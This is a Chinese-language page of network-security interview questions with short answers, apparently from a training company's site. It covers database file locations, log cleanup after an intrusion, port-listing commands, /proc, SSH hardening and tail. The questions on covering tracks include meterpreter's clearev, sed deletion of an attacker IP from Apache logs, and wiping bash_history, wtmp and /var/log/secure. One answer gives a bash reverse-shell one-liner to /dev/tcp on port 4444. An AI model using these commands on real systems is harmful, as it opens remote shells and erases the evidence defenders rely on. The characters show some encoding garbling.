數(shù)據(jù)庫
1.各種數(shù)據(jù)庫文件存放的位置mysql:
/usr/local/mysql/data/
C:\ProgramData\MySQL\MySQL Server 5.6\Data\
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/
系統(tǒng)
2.如何清理日志?
meterpreter: clearev
3.入侵 Linux 服務(wù)器后需要清除哪些日志?
web 日志,如 apache 的 access.log,error.log。直接將日志清除過于明顯,一般使用 sed 進(jìn)行定向清除
e.g. sed -i -e ‘/192.169.1.1/d’
history 命令的清除,也是對(duì)~/.bash_history 進(jìn)行定向清除
wtmp 日志的清除,/var/log/wtmp
登錄日志清除 /var/log/secure
LINUX
4.查看當(dāng)前端口連接的命令有哪些?netstat 和 ss 命令的區(qū)別和優(yōu)缺點(diǎn)
netstat -antp` `ss -l
ss 的優(yōu)勢(shì)在于它能夠顯示更多更詳細(xì)的有關(guān) TCP 和連接狀態(tài)的信息,而且比 netstat 更快速更高效。
5.反彈 shell 的常用命令?一般常反彈哪一種 shell?為什么?
bash -i>&/dev/tcp/x.x.x.x/4444
0>&1
6.通過 Linux 系統(tǒng)的/proc 目錄,能夠獲取到哪些信息,這些信息可以在安全上有哪些應(yīng)用?
ls /proc
系統(tǒng)信息,硬件信息,內(nèi)核版本,加載的模塊,進(jìn)程
7.linux 系統(tǒng)中,檢測(cè)哪些配置文件的配置項(xiàng),能夠提升 SSH 的安全性。
/etc/ssh/sshd___configiptables 配置
8.如何一條命令查看文件內(nèi)容最后一百行?
tail -n 100 filename
更多關(guān)于網(wǎng)絡(luò)安全培訓(xùn)的問題,歡迎咨詢千鋒教育在線名師,如果想要了解我們的師資、課程、項(xiàng)目實(shí)操的話可以點(diǎn)擊咨詢課程顧問,獲取試聽資格來試聽我們的課程,在線零距離接觸千鋒教育大咖名師,讓你輕松從入門到精通。